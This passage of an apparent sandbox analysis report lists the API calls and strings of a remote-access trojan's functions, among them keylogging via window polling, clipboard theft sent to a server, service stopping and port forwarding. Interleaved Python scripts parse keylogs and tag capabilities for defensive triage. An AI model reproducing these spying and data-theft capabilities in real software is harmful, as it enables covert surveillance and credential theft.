                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                        • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                                        • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                                                        • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                                        APIs
                                                          • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000), ref: 00455946
                                                        • GetLastError.KERNEL32 ref: 00455D6F
                                                        • __dosmaperr.LIBCMT ref: 00455D76
                                                        • GetFileType.KERNEL32 ref: 00455D82
                                                        • GetLastError.KERNEL32 ref: 00455D8C
                                                        • __dosmaperr.LIBCMT ref: 00455D95
                                                        • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                                        • CloseHandle.KERNEL32(?), ref: 00455EFF
                                                        • GetLastError.KERNEL32 ref: 00455F31
                                                        • __dosmaperr.LIBCMT ref: 00455F38
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                        • String ID: H
                                                        • API String ID: 4237864984-2852464175
                                                        • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                        • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                                        • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                        • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID: \&G$\&G$`&G
                                                        • API String ID: 269201875-253610517
                                                        • Opcode ID: f361c4fdd0f35bb0b590f5a399794b5d5c57f6d7c3c5bbd0b76040d27d65b4a3
                                                        • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                                        • Opcode Fuzzy Hash: f361c4fdd0f35bb0b590f5a399794b5d5c57f6d7c3c5bbd0b76040d27d65b4a3
                                                        • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 65535$udp
                                                        • API String ID: 0-1267037602
                                                        • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                        • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                        • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                        • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                        APIs
                                                        • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                        • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                        • GetForegroundWindow.USER32 ref: 0040AD84
                                                        • GetWindowTextLengthW.USER32 ref: 0040AD8D
                                                        • GetWindowTextW.USER32 ref: 0040ADC1
                                                        • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                          • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                        • String ID: [${ User has been idle for $ minutes }$]
                                                        • API String ID: 911427763-3954389425
                                                        • Opcode ID: a9d80c92317e710bb0ee7b8060ee11baa7f71990c7fa4e3373d3f7fac537cda3
                                                        • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                                        • Opcode Fuzzy Hash: a9d80c92317e710bb0ee7b8060ee11baa7f71990c7fa4e3373d3f7fac537cda3
                                                        • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F
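The function above polls the foreground window title (GetForegroundWindow, GetWindowTextLengthW, GetWindowTextW) between Sleep calls of 500 ms and 1000 ms and writes an idle marker built from the fragments `[`, `{ User has been idle for `, ` minutes }` and `]`. The parser below is an added example, not part of the report and not Remcos code, for triaging a recovered keylog: it splits the text into per-window segments and collects the idle markers. Treating every other bracketed line as a window-title header is an assumption of this example, and SAMPLE_LOG is constructed, not a captured log.

```python
"""Summarise idle markers and window segments in a Remcos-style keylog.

Added example, not from the report. IDLE_RE is pieced together from the function's
String ID list; TITLE_RE and SAMPLE_LOG are assumptions of this example.
"""
from __future__ import annotations
import re
from dataclasses import dataclass, field

IDLE_RE = re.compile(r"^\[\{ User has been idle for (\d+) minutes \}\]$")
TITLE_RE = re.compile(r"^\[(?!\{)(.+)\]$")  # assumed: "[<window title>]" header lines

@dataclass
class Segment:
    title: str
    keystroke_lines: int = 0
    idle_marks: list = field(default_factory=list)  # idle minutes as reported, in order

def parse_keylog(text: str) -> list[Segment]:
    """Group captured lines under the window title that preceded them."""
    segs: list[Segment] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        t = TITLE_RE.match(line)
        if t:
            segs.append(Segment(title=t.group(1).strip()))
            continue
        if not segs:                      # text before any header
            segs.append(Segment(title="<no window>"))
        m = IDLE_RE.match(line)
        if m:
            segs[-1].idle_marks.append(int(m.group(1)))
        else:
            segs[-1].keystroke_lines += 1
    return segs

def longest_idle(segs: list[Segment]) -> int:
    """Largest single idle value reported. The listing alone does not show whether
    consecutive markers are cumulative or per-interval, so they are not summed."""
    return max((m for s in segs for m in s.idle_marks), default=0)

def active_windows(segs: list[Segment]) -> list[str]:
    """Titles under which keystrokes were actually captured."""
    return [s.title for s in segs if s.keystroke_lines]

# Constructed sample, not a captured log.
SAMPLE_LOG = """\
[Untitled - Notepad]
meeting notes for monday
[{ User has been idle for 5 minutes }]
[{ User has been idle for 10 minutes }]
[Inbox - Outlook]
hunter2
"""

if __name__ == "__main__":
    segs = parse_keylog(SAMPLE_LOG)
    for s in segs:
        print(s)
    print("longest idle:", longest_idle(segs), "active:", active_windows(segs))
```

The window titles are the useful part for scoping: they tell you which applications (mail client, browser, password manager) were in the foreground while keystrokes were captured, which is what drives credential-reset decisions.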
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LongNamePath
                                                        • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                        • API String ID: 82841172-425784914
                                                        • Opcode ID: 9fc837d8cdd91ddad254a0e7a0cf26b33e0d7c4ac323512d933d46fc1d77c410
                                                        • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                        • Opcode Fuzzy Hash: 9fc837d8cdd91ddad254a0e7a0cf26b33e0d7c4ac323512d933d46fc1d77c410
                                                        • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                        • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                        • __dosmaperr.LIBCMT ref: 0043A926
                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                        • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                        • __dosmaperr.LIBCMT ref: 0043A963
                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                        • __dosmaperr.LIBCMT ref: 0043A9B7
                                                        • _free.LIBCMT ref: 0043A9C3
                                                        • _free.LIBCMT ref: 0043A9CA
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                        • String ID:
                                                        • API String ID: 2441525078-0
                                                        • Opcode ID: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                                        • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                        • Opcode Fuzzy Hash: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                                        • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                        APIs
                                                        • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                        • GetMessageA.USER32 ref: 0040556F
                                                        • TranslateMessage.USER32(?), ref: 0040557E
                                                        • DispatchMessageA.USER32 ref: 00405589
                                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                        • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                        • String ID: CloseChat$DisplayMessage$GetMessage
                                                        • API String ID: 2956720200-749203953
                                                        • Opcode ID: 92a42e6f76523c23ad071d277faa5832b5c30b25a00b0af7c670b91f71b4b998
                                                        • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                                        • Opcode Fuzzy Hash: 92a42e6f76523c23ad071d277faa5832b5c30b25a00b0af7c670b91f71b4b998
                                                        • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                                        APIs
                                                          • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                                        • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                                        • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                        • String ID: 0VG$0VG$<$@$Temp
                                                        • API String ID: 1704390241-2575729100
                                                        • Opcode ID: 770267ec3d45abc508c60553e0d69256dfd3bd3466962ea0f4637c0737b4c84d
                                                        • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                                        • Opcode Fuzzy Hash: 770267ec3d45abc508c60553e0d69256dfd3bd3466962ea0f4637c0737b4c84d
                                                        • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                        APIs
                                                        • OpenClipboard.USER32 ref: 0041697C
                                                        • EmptyClipboard.USER32 ref: 0041698A
                                                        • CloseClipboard.USER32 ref: 00416990
                                                        • OpenClipboard.USER32 ref: 00416997
                                                        • GetClipboardData.USER32 ref: 004169A7
                                                        • GlobalLock.KERNEL32 ref: 004169B0
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                        • CloseClipboard.USER32 ref: 004169BF
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                        • String ID: !D@
                                                        • API String ID: 2172192267-604454484
                                                        • Opcode ID: da78ba80ec0729aaebbd7618c01a60a0d67124b513bef4f543176b1e835a0158
                                                        • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                                        • Opcode Fuzzy Hash: da78ba80ec0729aaebbd7618c01a60a0d67124b513bef4f543176b1e835a0158
                                                        • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                        APIs
                                                        • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                        • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                        • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                        • CloseHandle.KERNEL32(?), ref: 004134A0
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                        • String ID:
                                                        • API String ID: 297527592-0
                                                        • Opcode ID: 574f29b59094fb47ce71c879203f8806fd1a71798bcc0508934a1059045681f6
                                                        • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                        • Opcode Fuzzy Hash: 574f29b59094fb47ce71c879203f8806fd1a71798bcc0508934a1059045681f6
                                                        • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                        APIs
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                        • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                        • String ID:
                                                        • API String ID: 221034970-0
                                                        • Opcode ID: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                                        • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                        • Opcode Fuzzy Hash: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                                        • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
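The blocks in this listing are regular enough to parse: each ends with an `Instruction Fuzzy Hash` line, API calls appear as `Name.MODULE(args), ref: ADDR`, and strings are joined with `$` in the `String ID` field. The script below is an added example, not part of the report and not Joe Sandbox code: it parses such blocks from a saved text copy of the report and tags each with the capability its API and string set implies, including naming the `ControlService` control code (the `00000001` above is `SERVICE_CONTROL_STOP`). The rule table is this editor's reading of the blocks on this page, which is why it sits after the service block and also covers the clipboard block earlier; `REPORT_EXCERPT` is an abridged copy of those two blocks.

```python
"""Parse function blocks of the kind shown above (Joe Sandbox IDA-plugin output
saved as text) and tag each with the capability its API set implies.

Added example; not part of the report and not Joe Sandbox code. RULES is this
editor's reading of the blocks on this page; REPORT_EXCERPT is an abridged copy
of the clipboard-grab and service-stop blocks from the listing.
"""
from __future__ import annotations
import re
from dataclasses import dataclass, field
from typing import Optional

# "• Name.MODULE(args), ref: ADDR", also in the indented "Part of subcall function" form.
API_RE = re.compile(r"^•\s*(?:Part of subcall function [0-9A-F]+:\s*)?(\w+)\.[A-Z0-9_]+(?:\(([^)]*)\))?")
FIELD_RE = re.compile(r"^•\s*(API ID|String ID|API String ID|Opcode ID|Instruction ID|"
                      r"Opcode Fuzzy Hash|Instruction Fuzzy Hash):\s*(.*)$")

# Win32 service control codes (dwControl argument of ControlService).
SERVICE_CONTROLS = {1: "SERVICE_CONTROL_STOP", 2: "SERVICE_CONTROL_PAUSE",
                    3: "SERVICE_CONTROL_CONTINUE", 4: "SERVICE_CONTROL_INTERROGATE"}

@dataclass
class FuncBlock:
    calls: list = field(default_factory=list)      # (api name, raw argument text)
    strings: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    @property
    def apis(self) -> set[str]:
        return {name for name, _ in self.calls}

def parse_blocks(text: str) -> list[FuncBlock]:
    """Split the listing at every 'Instruction Fuzzy Hash' line, the last field of a block."""
    blocks, cur = [], FuncBlock()
    for raw in text.splitlines():
        line = raw.strip()
        f = FIELD_RE.match(line)
        if f:
            key, val = f.group(1), f.group(2).strip()
            cur.fields[key] = val
            if key == "String ID":
                # The report joins strings with '$'; a literal '$' inside a string is lost here.
                cur.strings = [s for s in val.split("$") if s]
            elif key == "Instruction Fuzzy Hash":
                blocks.append(cur)
                cur = FuncBlock()
            continue
        a = API_RE.match(line)
        if a:
            cur.calls.append((a.group(1), a.group(2) or ""))
    return blocks

def service_control(b: FuncBlock) -> Optional[str]:
    """Name the dwControl passed to ControlService when the listing shows it as a constant."""
    for name, args in b.calls:
        if name == "ControlService":
            parts = args.split(",")
            if len(parts) > 1 and re.fullmatch(r"[0-9A-F]{8}", parts[1]):
                return SERVICE_CONTROLS.get(int(parts[1], 16), "0x" + parts[1])
    return None

RULES = {
    "clipboard_grab_to_c2": lambda b: {"OpenClipboard", "GetClipboardData", "send"} <= b.apis,
    "service_stop": lambda b: {"OpenSCManagerW", "ControlService"} <= b.apis
                              and service_control(b) == "SERVICE_CONTROL_STOP",
    "foreground_window_poll": lambda b: {"GetForegroundWindow", "GetWindowTextW", "Sleep"} <= b.apis,
    "self_deleting_vbs": lambda b: any("Wscript.ScriptFullName" in s for s in b.strings),
    "port_forward_commands": lambda b: {"StartForward", "StartReverse"} <= set(b.strings),
}

def tag(b: FuncBlock) -> list[str]:
    return sorted(name for name, rule in RULES.items() if rule(b))

def summarize(text: str) -> list:
    """(Opcode ID, tags) for every block that hit at least one rule."""
    out = []
    for b in parse_blocks(text):
        t = tag(b)
        if t:
            out.append((b.fields.get("Opcode ID", "?"), t))
    return out

# Abridged copy of two blocks from the listing above.
REPORT_EXCERPT = """\
APIs
• OpenClipboard.USER32 ref: 0041697C
• EmptyClipboard.USER32 ref: 0041698A
• GetClipboardData.USER32 ref: 004169A7
• GlobalLock.KERNEL32 ref: 004169B0
• GlobalUnlock.KERNEL32(00000000), ref: 004169B9
• CloseClipboard.USER32 ref: 004169BF
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
Memory Dump Source
• Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
• String ID: !D@
• Opcode ID: da78ba80ec0729aaebbd7618c01a60a0d67124b513bef4f543176b1e835a0158
• Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
• OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
• Opcode ID: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
• Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
"""

if __name__ == "__main__":
    for opcode_id, tags in summarize(REPORT_EXCERPT):
        print(opcode_id[:16], tags)
```

Feed it the whole saved report (`summarize(open("report.txt").read())`) to get a capability map keyed by Opcode ID, which is stable across samples of the same build and so makes a usable pivot when comparing Remcos payloads.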
                                                        APIs
                                                        • _free.LIBCMT ref: 004481B5
                                                          • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                          • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                        • _free.LIBCMT ref: 004481C1
                                                        • _free.LIBCMT ref: 004481CC
                                                        • _free.LIBCMT ref: 004481D7
                                                        • _free.LIBCMT ref: 004481E2
                                                        • _free.LIBCMT ref: 004481ED
                                                        • _free.LIBCMT ref: 004481F8
                                                        • _free.LIBCMT ref: 00448203
                                                        • _free.LIBCMT ref: 0044820E
                                                        • _free.LIBCMT ref: 0044821C
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                        • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                        • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                        • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Eventinet_ntoa
                                                        • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                        • API String ID: 3578746661-3604713145
                                                        • Opcode ID: a7da0e03d27dfd4f061563b37853281ba9d59ca7803a508e71efe6cf15854c11
                                                        • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                                        • Opcode Fuzzy Hash: a7da0e03d27dfd4f061563b37853281ba9d59ca7803a508e71efe6cf15854c11
                                                        • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                                        APIs
                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DecodePointer
                                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                        • API String ID: 3527080286-3064271455
                                                        • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                        • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                                        • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                        • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                                        APIs
                                                        • GetConsoleCP.KERNEL32 ref: 0044B47E
                                                        • __fassign.LIBCMT ref: 0044B4F9
                                                        • __fassign.LIBCMT ref: 0044B514
                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                        • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000), ref: 0044B559
                                                        • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000), ref: 0044B592
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                        • String ID: PkGNG
                                                        • API String ID: 1324828854-263838557
                                                        • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                        • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                        • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                        • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                        APIs
                                                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                          • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                        • Sleep.KERNEL32(00000064), ref: 0041755C
                                                        • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CreateDeleteExecuteShellSleep
                                                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                        • API String ID: 1462127192-2001430897
